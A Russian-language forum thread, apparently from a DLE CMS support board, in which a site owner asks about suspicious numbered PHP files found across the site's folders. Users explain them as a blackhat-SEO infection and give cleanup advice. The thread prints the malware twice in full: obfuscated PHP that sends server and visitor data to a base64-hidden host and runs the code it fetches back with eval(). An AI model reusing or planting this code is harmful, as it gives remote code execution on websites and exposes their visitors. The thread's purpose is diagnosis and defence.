Перейти к публикации

Обнаружил у себя на сайте странный файлы


Рекомендованные сообщения

Обнаружил у себя на сайте странный файлы

Почти в каждой папке, везде есть по одному файлу типа 151247.php или 22446.php, в каждой папке разное название из цифр. Весят они одинаково (2кб), а содержится в них следующее:

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($.".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="ffed22181d5c4b87dd6e20248545fd92") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z)) eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>[/code]

Чё это такое? Если можно подробнее...

Ссылка на сообщение
Поделиться на других сайтах

Не от скрипта это точно, он писать PHP куда в почти все папки не умеет. Если их происхождение неизвестно, значит безопасность вашего сервера вызывает сомнения

Причины:

1. Уязвимые сторонние модификации

2. Уязвимые сторонние скрипты

3. Заражен ваш локальный компьютер в результате чего ващ доступ по FTP утерян

4. Уязвим сервер хостинг провайдера.

Ссылка на сообщение
Поделиться на других сайтах

1,2 пункт отпадает DLE 8.3 чистый.

чё за код? как он опасен?

Как можно узнать как попал на ко мне?

PS Использую хостинг.

Изменено пользователем BMWshka
Ссылка на сообщение
Поделиться на других сайтах

На 90% уверен, что заражен Ваш FTP клиент.

Установите антивирус и проверьте.

Запустите и бесплатно проверьте компьютер на вирусы: http://www.freedrweb.com/cureit/

Ссылка на сообщение
Поделиться на других сайтах

Проверил ПК на вирусы, вирусов не обнаружено.

Пользуюсь Kaspersky Internet Security 2010

FTP клиент "Total Commander"

А что это за файлы? И для чего были загружены на сервер?

Ссылка на сообщение
Поделиться на других сайтах

<?php error_reporting(0);

$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);


$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);


$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);


$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);


$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);


$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);


$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);


$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);


$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);


$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);


$z="/?".base64_encode($a).".".base64_encode($.".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g) . " . " . base64_encode ( $h ) . " . e . " . base64_encode ( $i ) . " . " . base64_encode ( $j );

$f = base64_decode ( "cnNzbmV3cy53cw==" );


if ( basename ( $c ) == basename ( $i ) && isset ( $_REQUEST["q"] ) && md5 ( $_REQUEST["q"] ) == "ffed22181d5c4b87dd6e20248545fd92" ) $f = $_REQUEST["id"];


if ( ( include ( base64_decode ( "aHR0cDovL2Fkcy4=") . $f . $z ) ) );

else if ( $c = file_get_contents ( base64_decode ( "aHR0cDovLzcu" ) . $f . $z ) ) eval ( $c );

else {

    $cu = curl_init ( base64_decode ( "aHR0cDovLzcxLg == " ) . $f . $z );

    curl_setopt ( $cu, CURLOPT_RETURNTRANSFER, 1 );

    $o = curl_exec ( $cu );

    curl_close ( $cu );

    eval ( $o );

};

die();

?>[/code]

Это этот код но в более читаемом виде. Лучше удалите и не думайте про плохое :rolleyes:

Ссылка на сообщение
Поделиться на других сайтах

да я уже удалил, вот только хотел узнать откуда они появились, чтоб повтора не было )

И не плохо было бы узнать чё он делает, можно с помощью этих файлов узнать доступ к сайту? к базе? Слить? Залить?

Изменено пользователем BMWshka
Ссылка на сообщение
Поделиться на других сайтах

Ваш сайт взломан. Ищите файл, через который вам залили шелл.

Это эксплойт. Такие эксплойты вставляют на ваших 404-ых страницы редирект на свой сайт или ссылки для черной поисковой оптимизации . Запросы у вас идут на phpsearch.cn (зашифровано в base64).

При данном заражении у вас создаются файлы .htaccess:

Options -MultiViews

ErrorDocument 404 //path/to/upload/folder/subfolder/XXXXXX.php

При обращении к странице 404, выдается левые ссылки. На разных других сайтах раскидываются ссылки на несуществующие страницы на вашем сайте, поисковики индексируют их, и люди с поиска попадают в итоге на эти страницы xxxxx.php. Дальше обычно следует редирект.

Описание на английском есть тут: _http://www.romantika.name/v2/upload-folder-invasions-and-security/

Ссылка на сообщение
Поделиться на других сайтах

Ваш сайт взломан. Ищите файл, через который вам залили шелл.

Это эксплойт. Такие эксплойты вставляют на ваших 404-ых страницы редирект на свой сайт или ссылки для черной поисковой оптимизации . Запросы у вас идут на phpsearch.cn (зашифровано в base64).

При данном заражении у вас создаются файлы .htaccess:

Options -MultiViews

ErrorDocument 404 //path/to/upload/folder/subfolder/XXXXXX.php

При обращении к странице 404, выдается левые ссылки. На разных других сайтах раскидываются ссылки на несуществующие страницы на вашем сайте, поисковики индексируют их, и люди с поиска попадают в итоге на эти страницы xxxxx.php. Дальше обычно следует редирект.

Описание на английском есть тут: _http://www.romantika.name/v2/upload-folder-invasions-and-security/

угу точно, .htaccess почистил, как можно узнать как точно был взломан сайт? Чтобы закрыть дырку.

Ссылка на сообщение
Поделиться на других сайтах

Самые частые варианты:

- украдены FTP-пароли из Total Commander (сменить пароль, вводить вручную)

- кривые сторонние модули, с которыми залит шелл (решение тогда - установка ДЛЕ по новой, без модулей)

- криво настроен сервер, это позволяет из соседних аккаунтов создавать файлы в ваших папках (про этот случай было написано по ссылке, что я давал выше). тут тогда только смена хостера решает вопрос.

Ссылка на сообщение
Поделиться на других сайтах

Скорее всего это хостинг, так как до этого хостился год в mchost месяца два назад перешёл к другому, и началось...

Модули не какие не стоят, двиг чистый!

Сменил доступ к сайту, посмотрим чё дальше будет.

Ссылка на сообщение
Поделиться на других сайтах

Проверьте все папки с правами 777, там надо чистить всё.

Скорее всего, что на сервере неправильно настроена панель Cpanel или Parallels, что позволяет с соседнего аккаунта записывать данные в ваши папки. :ph34r:

Ссылка на сообщение
Поделиться на других сайтах

Проверьте все папки с правами 777, там надо чистить всё.

Скорее всего, что на сервере неправильно настроена панель Cpanel или Parallels, что позволяет с соседнего аккаунта записывать данные в ваши папки. :ph34r:

Да на сервере стоит Cpanel, как узнать что он не правильно настроен? Может попробовать попасть к соседям? )

Вот ещё странные файлы на которые ругается антивирус DLE

./engine/modules/c_navigation.php

./engine/inc/functions.inc.php

./engine/inc/makethumb.php

./engine/inc/inserttag.php

./engine/inc/init.php

./adm.php

Изменено пользователем BMWshka
Ссылка на сообщение
Поделиться на других сайтах

Проверьте все папки с правами 777, там надо чистить всё.

Скорее всего, что на сервере неправильно настроена панель Cpanel или Parallels, что позволяет с соседнего аккаунта записывать данные в ваши папки. :ph34r:

Да на сервере стоит Cpanel, как узнать что он не правильно настроен? Может попробовать попасть к соседям? )

Вот ещё странные файлы на которые ругается антивирус DLE

./engine/modules/c_navigation.php

./engine/inc/functions.inc.php

./engine/inc/makethumb.php

./engine/inc/inserttag.php

./engine/inc/init.php

./adm.php

замените все файлы с чистого дистрибутива, и удалите те файлы на

которих ругаеться антивирус

Ссылка на сообщение
Поделиться на других сайтах

я тоже сперва так подумал, что надо заменить, только вот скачать с сайта не могу так как лицензия кончилась, а на компе DLE не остался, как теперь быть?

Ссылка на сообщение
Поделиться на других сайтах

Что за ерунда насчет хостинга?

Сам пользуюсь этим хостингом 2 года и никаких проблем нет и небыло.

99% - это сперли пароли от сервера.

Смените просто их и не сохраняйте в тотале, он их плохо защищает.

Ссылка на сообщение
Поделиться на других сайтах

Что за ерунда насчет хостинга?

Сам пользуюсь этим хостингом 2 года и никаких проблем нет и небыло.

99% - это сперли пароли от сервера.

Смените просто их и не сохраняйте в тотале, он их плохо защищает.

Каким?

Ссылка на сообщение
Поделиться на других сайтах

Интересно что же дальше будет,,, очень хороший вопрос, т.к. недавно сам нашёл айлы левые в движке но не пхп а тхт с текстом внутри типо qqqqqqqqqqqq

это из за чего ? ))

Ссылка на сообщение
Поделиться на других сайтах

./engine/modules/c_navigation.php

./engine/inc/functions.inc.php

./engine/inc/makethumb.php

./engine/inc/inserttag.php

./engine/inc/init.php

это файлы от старых версий скрипта, скрипт их больше не использует и их можно удалить

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...